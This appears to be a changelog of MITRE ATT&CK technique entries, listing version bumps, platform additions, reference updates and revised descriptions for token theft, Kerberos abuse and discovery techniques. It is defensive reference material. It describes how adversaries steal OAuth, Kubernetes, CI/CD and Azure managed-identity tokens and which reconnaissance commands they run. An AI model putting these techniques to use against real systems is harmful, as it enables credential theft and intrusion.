description | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
| Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)
Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
In Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.(Citation: Entra Managed Identities 2025)(Citation: SpecterOps Managed Identity 2022)
Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)
Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |
external_references[2]['description'] | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021. | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved November 17, 2024. |
external_references[2]['url'] | https://auth0.com/learn/refresh-tokens/ | https://auth0.com/learn/refresh-tokens |
external_references[4]['description'] | Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024. | Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.cidersecurity.io/top-10-cicd-security-risks/ | https://web.archive.org/web/20220316130828/https://www.cidersecurity.io/top-10-cicd-security-risks/ |
x_mitre_version | 1.4 | 1.5 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'SpecterOps Managed Identity 2022', 'description': 'Andy Robbins. (2022, June 6). Managed Identity Attack Paths, Part 1: Automation Accounts. Retrieved March 18, 2025.', 'url': 'https://posts.specterops.io/managed-identity-attack-paths-part-1-automation-accounts-82667d17187a?gi=6a9daedade1c'} |
external_references | | {'source_name': 'Entra Managed Identities 2025', 'description': 'Microsoft Entra. (2025, February 27). How to use managed identities for Azure resources on an Azure VM to acquire an access token. Retrieved March 18, 2025.', 'url': 'https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token'} |
x_mitre_contributors | | Eliraz Levi, Hunters Security |
x_mitre_contributors | | Alon Klayman, Hunters Security |
[T1558] Steal or Forge Kerberos Tickets
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_system_requirements | ['Kerberos authentication enabled'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-17 19:49:11.455000+00:00 | 2025-04-15 19:58:25.352000+00:00 |
x_mitre_version | 1.6 | 1.7 |
[T1001.002] Data Obfuscation: Steganography
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-15 00:37:58.963000+00:00 | 2025-04-15 19:59:20.025000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1027.008] Obfuscated Files or Information: Stripped Payloads
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:26:49.584000+00:00 | 2025-04-15 19:58:18.337000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1553] Subvert Trust Controls
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Autoruns Analysis', 'Digital Certificate Validation', 'User Mode Signature Validation', 'Windows User Account Control', 'Application Control'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 17:17:37.292000+00:00 | 2025-04-15 19:59:00.906000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['root'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-14 16:28:19.781000+00:00 | 2025-04-15 19:58:08.135000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1573.001] Encrypted Channel: Symmetric Cryptography
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-26 20:58:19.356000+00:00 | 2025-04-15 19:58:14.636000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | | ESXi |
[T1218] System Binary Proxy Execution
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control', 'Digital Certificate Validation'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-03-01 16:25:43.150000+00:00 | 2025-04-15 19:58:27.332000+00:00 |
x_mitre_version | 3.1 | 3.2 |
[T1497.001] Virtualization/Sandbox Evasion: System Checks
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Static File Analysis', 'Signature-based detection', 'Host forensic analysis', 'Anti-virus'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:50:18.047000+00:00 | 2025-04-15 19:58:16.253000+00:00 |
x_mitre_version | 2.2 | 2.3 |
[T1542.001] Pre-OS Boot: System Firmware
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Host intrusion prevention systems', 'Anti-virus', 'File monitoring'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-04-16 12:21:51.311000+00:00 | 2025-04-15 19:58:09.046000+00:00 |
external_references[3]['description'] | Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved March 20, 2017. | Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024. |
external_references[3]['url'] | http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html | https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[1] | Network | Network Devices |
[T1082] System Information Discovery
Current version: 2.6
Version changed from: 2.5 → 2.6
Old description:
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
New description:
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an example, adversaries with user-level access can execute the <code>df -aH</code> command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. <code>show version</code>).(Citation: US-CERT-TA18-106A)
On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get`, `system version get`, and `storage filesystem list` (to list storage volumes).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:42:22.247000+00:00 | 2025-04-15 19:58:21.308000+00:00 |
description | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version ).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API) | An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the systemsetup configuration tool on macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. show version ).(Citation: US-CERT-TA18-106A) On ESXi servers, threat actors may gather system information from various esxcli utilities, such as `system hostname get`, `system version get`, and `storage filesystem list` (to list storage volumes).(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)(Citation: Varonis)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
[System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques) |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Varonis', 'description': 'Jason Hill. (2023, February 8). VMware ESXi in the Line of Ransomware Fire. Retrieved March 26, 2025.', 'url': 'https://www.varonis.com/blog/vmware-esxi-in-the-line-of-ransomware-fire'} |
external_references | | {'source_name': 'Crowdstrike Hypervisor Jackpotting Pt 2 2021', 'description': 'Michael Dawson. (2021, August 30). Hypervisor Jackpotting, Part 2: eCrime Actors Increase Targeting of ESXi Servers with Ransomware. Retrieved March 26, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/'} |
x_mitre_platforms | | ESXi |
[T1614.001] System Location Discovery: System Language Discovery
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-15 22:00:56.174000+00:00 | 2025-04-15 19:59:04.692000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1016] System Network Configuration Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
t | Adversaries may look for details about the network configura | t | Adversaries may look for details about the network configura |
| tion and settings, such as IP and/or MAC addresses, of syste | | tion and settings, such as IP and/or MAC addresses, of syste |
| ms they access or through information discovery of remote sy | | ms they access or through information discovery of remote sy |
| stems. Several operating system administration utilities exi | | stems. Several operating system administration utilities exi |
| st that can be used to gather this information. Examples inc | | st that can be used to gather this information. Examples inc |
| lude [Arp](https://attack.mitre.org/software/S0099), [ipconf | | lude [Arp](https://attack.mitre.org/software/S0099), [ipconf |
| ig](https://attack.mitre.org/software/S0100)/[ifconfig](http | | ig](https://attack.mitre.org/software/S0100)/[ifconfig](http |
| s://attack.mitre.org/software/S0101), [nbtstat](https://atta | | s://attack.mitre.org/software/S0101), [nbtstat](https://atta |
| ck.mitre.org/software/S0102), and [route](https://attack.mit | | ck.mitre.org/software/S0102), and [route](https://attack.mit |
| re.org/software/S0103). Adversaries may also leverage a [Ne | | re.org/software/S0103). Adversaries may also leverage a [Ne |
| twork Device CLI](https://attack.mitre.org/techniques/T1059/ | | twork Device CLI](https://attack.mitre.org/techniques/T1059/ |
| 008) on network devices to gather information about configur | | 008) on network devices to gather information about configur |
| ations and settings, such as IP addresses of configured inte | | ations and settings, such as IP addresses of configured inte |
| rfaces and static/dynamic routes (e.g. <code>show ip route</ | | rfaces and static/dynamic routes (e.g. <code>show ip route</ |
| code>, <code>show ip interface</code>).(Citation: US-CERT-TA | | code>, <code>show ip interface</code>).(Citation: US-CERT-TA |
| 18-106A)(Citation: Mandiant APT41 Global Intrusion ) Advers | | 18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi |
| aries may use the information from [System Network Configura | | , adversaries may leverage esxcli to gather network configur |
| tion Discovery](https://attack.mitre.org/techniques/T1016) d | | ation information. For example, the command `esxcli network |
| uring automated discovery to shape follow-on behaviors, incl | | nic list` will retrieve the MAC address, while `esxcli netwo |
| uding determining certain access within the target network a | | rk ip interface ipv4 get` will retrieve the local IPv4 addre |
| nd what actions to do next. | | ss.(Citation: Trellix Rnasomhouse 2024) Adversaries may use |
| | | the information from [System Network Configuration Discover |
| | | y](https://attack.mitre.org/techniques/T1016) during automat |
| | | ed discovery to shape follow-on behaviors, including determi |
| | | ning certain access within the target network and what actio |
| | | ns to do next. |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-07-28 14:40:54.580000+00:00 | 2025-04-15 19:58:40.773000+00:00 |
description | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route , show ip interface ).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. | Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route , show ip interface ).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion ) On ESXi, adversaries may leverage esxcli to gather network configuration information. For example, the command `esxcli network nic list` will retrieve the MAC address, while `esxcli network ip interface ipv4 get` will retrieve the local IPv4 address.(Citation: Trellix Rnasomhouse 2024)
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Trellix Rnasomhouse 2024', 'description': 'Pham Duy Phuc, Max Kersten, Noël Keijzer, and Michaël Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.', 'url': 'https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/'} |
x_mitre_platforms | | ESXi |
[T1049] System Network Connections Discovery
Current version: 2.5
Version changed from: 2.4 → 2.5
t | Adversaries may attempt to get a listing of network connecti | t | Adversaries may attempt to get a listing of network connecti |
| ons to or from the compromised system they are currently acc | | ons to or from the compromised system they are currently acc |
| essing or from remote systems by querying for information ov | | essing or from remote systems by querying for information ov |
| er the network. An adversary who gains access to a system | | er the network. An adversary who gains access to a system |
| that is part of a cloud-based environment may map out Virtua | | that is part of a cloud-based environment may map out Virtua |
| l Private Clouds or Virtual Networks in order to determine w | | l Private Clouds or Virtual Networks in order to determine w |
| hat systems and services are connected. The actions performe | | hat systems and services are connected. The actions performe |
| d are likely the same types of discovery techniques dependin | | d are likely the same types of discovery techniques dependin |
| g on the operating system, but the resulting information may | | g on the operating system, but the resulting information may |
| include details about the networked cloud environment relev | | include details about the networked cloud environment relev |
| ant to the adversary's goals. Cloud providers may have diffe | | ant to the adversary's goals. Cloud providers may have diffe |
| rent ways in which their virtual networks operate.(Citation: | | rent ways in which their virtual networks operate.(Citation: |
| Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net | | Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Net |
| work Overview)(Citation: Google VPC Overview) Similarly, adv | | work Overview)(Citation: Google VPC Overview) Similarly, adv |
| ersaries who gain access to network devices may also perform | | ersaries who gain access to network devices may also perform |
| similar discovery activities to gather information about co | | similar discovery activities to gather information about co |
| nnected systems and services. Utilities and commands that a | | nnected systems and services. Utilities and commands that a |
| cquire this information include [netstat](https://attack.mit | | cquire this information include [netstat](https://attack.mit |
| re.org/software/S0104), "net use," and "net session" with [N | | re.org/software/S0104), "net use," and "net session" with [N |
| et](https://attack.mitre.org/software/S0039). In Mac and Lin | | et](https://attack.mitre.org/software/S0039). In Mac and Lin |
| ux, [netstat](https://attack.mitre.org/software/S0104) and < | | ux, [netstat](https://attack.mitre.org/software/S0104) and < |
| code>lsof</code> can be used to list current connections. <c | | code>lsof</code> can be used to list current connections. <c |
| ode>who -a</code> and <code>w</code> can be used to show whi | | ode>who -a</code> and <code>w</code> can be used to show whi |
| ch users are currently logged in, similar to "net session". | | ch users are currently logged in, similar to "net session". |
| Additionally, built-in features native to network devices an | | Additionally, built-in features native to network devices an |
| d [Network Device CLI](https://attack.mitre.org/techniques/T | | d [Network Device CLI](https://attack.mitre.org/techniques/T |
| 1059/008) may be used (e.g. <code>show ip sockets</code>, <c | | 1059/008) may be used (e.g. <code>show ip sockets</code>, <c |
| ode>show tcp brief</code>).(Citation: US-CERT-TA18-106A) | | ode>show tcp brief</code>).(Citation: US-CERT-TA18-106A) On |
| | | ESXi servers, the command `esxi network ip connection list` |
| | | can be used to list active network connections.(Citation: Sy |
| | | gnia ESXi Ransomware 2025) |
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-09-06 22:35:34.231000+00:00 | 2025-04-15 19:58:45.496000+00:00 |
description | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets , show tcp brief ).(Citation: US-CERT-TA18-106A) | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary's goals. Cloud providers may have different ways in which their virtual networks operate.(Citation: Amazon AWS VPC Guide)(Citation: Microsoft Azure Virtual Network Overview)(Citation: Google VPC Overview) Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039). In Mac and Linux, [netstat](https://attack.mitre.org/software/S0104) and lsof can be used to list current connections. who -a and w can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) may be used (e.g. show ip sockets , show tcp brief ).(Citation: US-CERT-TA18-106A) On ESXi servers, the command `esxi network ip connection list` can be used to list active network connections.(Citation: Sygnia ESXi Ransomware 2025) |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[4] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
external_references | | {'source_name': 'Sygnia ESXi Ransomware 2025', 'description': 'Zhongyuan Hau (Aaron), Ren Jie Yow, and Yoav Mazor. (2025, January 21). ESXi Ransomware Attacks: Stealthy Persistence through. Retrieved March 27, 2025.', 'url': 'https://www.sygnia.co/blog/esxi-ransomware-ssh-tunneling-defense-strategies/'} |
x_mitre_platforms | | ESXi |
[T1033] System Owner/User Discovery
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-09-29 19:50:06.736000+00:00 | 2025-04-15 19:58:02.301000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Network | Network Devices |
[T1216] System Script Proxy Execution
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Application control', 'Digital Certificate Validation'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-04-18 14:43:46.045000+00:00 | 2025-04-16 20:37:23.298000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 2.0 | 2.1 |
[T1569] System Services
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-20 19:55:40.527000+00:00 | 2025-04-15 19:59:10.127000+00:00 |
x_mitre_version | 1.3 | 1.4 |
[T1529] System Shutdown/Reboot
Current version: 1.4
Version changed from: 1.3 → 1.4
t | Adversaries may shutdown/reboot systems to interrupt access | t | Adversaries may shutdown/reboot systems to interrupt access |
| to, or aid in the destruction of, those systems. Operating s | | to, or aid in the destruction of, those systems. Operating s |
| ystems may contain commands to initiate a shutdown/reboot of | | ystems may contain commands to initiate a shutdown/reboot of |
| a machine or network device. In some cases, these commands | | a machine or network device. In some cases, these commands |
| may also be used to initiate a shutdown/reboot of a remote c | | may also be used to initiate a shutdown/reboot of a remote c |
| omputer or network device via [Network Device CLI](https://a | | omputer or network device via [Network Device CLI](https://a |
